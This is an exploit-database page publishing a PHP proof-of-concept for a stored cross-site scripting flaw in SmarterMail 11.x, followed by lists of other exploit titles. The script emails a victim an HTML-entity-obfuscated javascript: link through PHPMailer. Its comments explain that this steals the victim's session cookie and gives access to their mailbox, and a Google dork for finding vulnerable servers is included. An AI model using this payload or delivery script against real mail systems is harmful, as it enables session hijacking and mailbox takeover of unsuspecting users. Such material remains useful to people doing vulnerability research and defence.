Menu

Search for hundreds of thousands of exploits

"SmarterMail Enterprise and Standard 11.x - Persistent Cross-Site Scripting"

Author

Exploit author

"Saeed reza Zamanian"

Platform

Exploit platform

asp

Release date

Exploit published date

2014-01-17

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
<?php

/*  
# Exploit Title: SmarterMail Enterprise and Standard <=11.x Stored XSS
# Google Dork: intext:"SmarterTools Inc." inurl:login.aspx
# Date: 15 Jan 2014
# Exploit Author: Saeed reza Zamanian  [s.zamanian [AT] imenantivirus.com]
# Vendor Homepage: http://www.smartertools.com/
# Software Link (Standard Version): http://www.smartertools.com/smartermail/mail-server-download.aspx
# Version: <= 11.x
# Tested on: Windows 2008 R2 HTTPServer[Microsoft-IIS/7.5] ASP_NET[4.0.30319]
# CVE : vendor id=2560

Greetz:  H.Zamanian, K.Kia, K.Khani

WebApp Desciption:
	SmarterMail delivers Exchange-level email server software and instant messaging for a fraction of the cost. With lower hardware requirements, superior stability and reduced maintenance costs, SmarterMail has significantly lower TCO and is the best-in-class of Microsoft Exchange alternative for businesses and hosting companies.

Vulnerability Description:
	 XSS codes can be stored in E-Mail Body.
	So you can send an email to the Victim with below payload and steal the victim's cookie.

	<a href=&#106;&#97;&#118;&#97;&#83;&#99;&#82;&#105;&#112;&#116;:alert(document.cookie)>Click Me, Please...</a>\r\n

	 NOTE: javascript html char encode = &#106;&#97;&#118;&#97;&#83;&#99;&#82;&#105;&#112;&#116;

	then you will be able to get into the victim's mailbox via the url:
	http://[WebSite]/[Smarter]/Default.aspx

## I used phpmailer class for beside of the exploit so you need to download it here and run the exploit in the phpmailer directory:
	http://code.google.com/a/apache-extras.org/p/phpmailer/downloads/list


*/

echo "<title>SmarterMail Enterprise and Standard <= 11.X XSS Exploit</title>";
require_once('class.phpmailer.php');

$mail = new PHPMailer(true); // the true param means it will throw exceptions on errors, which we need to catch
$mail->IsSMTP(); // telling the class to use SMTP


/* SETTINGS */
$smtp_user = "attacker[at]email.com"; 	// any valid smtp account
$smtp_pass = "PASSWORD";		// Your PASSWORD
$smtp_port = "25";			// SMTP PORT Default: 25
$smtp_host = "mail.email.com"; 		// any valid smtp server
$victim = "victim@mail.com";
$subject = "Salam";
$body = '<a href=&#106;&#97;&#118;&#97;&#83;&#99;&#82;&#105;&#112;&#116;:alert("XSS")>Click Me, Please...</a>\r\n';


try {
  $mail->SMTPDebug  = 2;                  // enables SMTP debug information (for testing)
  $mail->SMTPAuth   = true;               // enable SMTP authentication
  $mail->Host       = $smtp_host;
  $mail->Port       = $smtp_port;
  $mail->Username   = $smtp_user; 	 // SMTP account username
  $mail->Password   = $smtp_pass;        // SMTP account password

  $mail->SetFrom($smtp_user, 'Attacker');
  $mail->AddReplyTo($smtp_user, 'Attacker');

  $mail->AddAddress($victim, 'Victim');
  $mail->Subject = $subject;

  $mail->MsgHTML($body);
  $mail->Send();
  echo "Message Sent OK</p>\n";
} catch (phpmailerException $e) {
  echo $e->errorMessage();
} catch (Exception $e) {
  echo $e->getMessage();
}
?>

</body>
</html>
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-07-10 "HelloWeb 2.0 - Arbitrary File Download" webapps asp bRpsd
2020-03-16 "Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)" webapps asp "Miguel Mendez Z"
2020-01-24 "OLK Web Store 2020 - Cross-Site Request Forgery" webapps asp "Joel Aviad Ossi"
2019-12-18 "Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting" webapps asp "Harshit Shukla"
2019-11-18 "Crystal Live HTTP Server 6.01 - Directory Traversal" webapps asp "numan türle"
2019-08-16 "Web Wiz Forums 12.01 - 'PF' SQL Injection" webapps asp n1x_
2019-05-06 "microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection" webapps asp "felipe andrian"
2019-02-12 "Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow" dos asp "Kaustubh G. Padwad"
2018-11-05 "Advantech WebAccess SCADA 8.3.2 - Remote Code Execution" webapps asp "Chris Lyne"
2018-05-29 "IssueTrak 7.0 - SQL Injection" webapps asp "Chris Anastasio"
Release Date Title Type Platform Author
2020-07-22 "NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)" local windows "Saeed reza Zamanian"
2020-07-06 "Fire Web Server 0.1 - Remote Denial of Service (PoC)" dos windows "Saeed reza Zamanian"
2017-10-02 "NPM-V (Network Power Manager) 2.4.1 - Password Reset" webapps hardware "Saeed reza Zamanian"
2017-06-26 "Eltek SmartPack - Backdoor Account" webapps hardware "Saeed reza Zamanian"
2016-09-27 "NetMan 204 - Backdoor Account" remote hardware "Saeed reza Zamanian"
2016-09-06 "PHPIPAM 1.2.1 - Multiple Vulnerabilities" webapps php "Saeed reza Zamanian"
2016-03-21 "D-Link DWR-932 Firmware 4.00 - Authentication Bypass" webapps hardware "Saeed reza Zamanian"
2016-02-20 "SOLIDserver < 5.0.4 - Local File Inclusion" webapps php "Saeed reza Zamanian"
2014-01-20 "AfterLogic Pro and Lite 7.1.1.1 - Persistent Cross-Site Scripting" webapps php "Saeed reza Zamanian"
2014-01-17 "SmarterMail Enterprise and Standard 11.x - Persistent Cross-Site Scripting" webapps asp "Saeed reza Zamanian"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.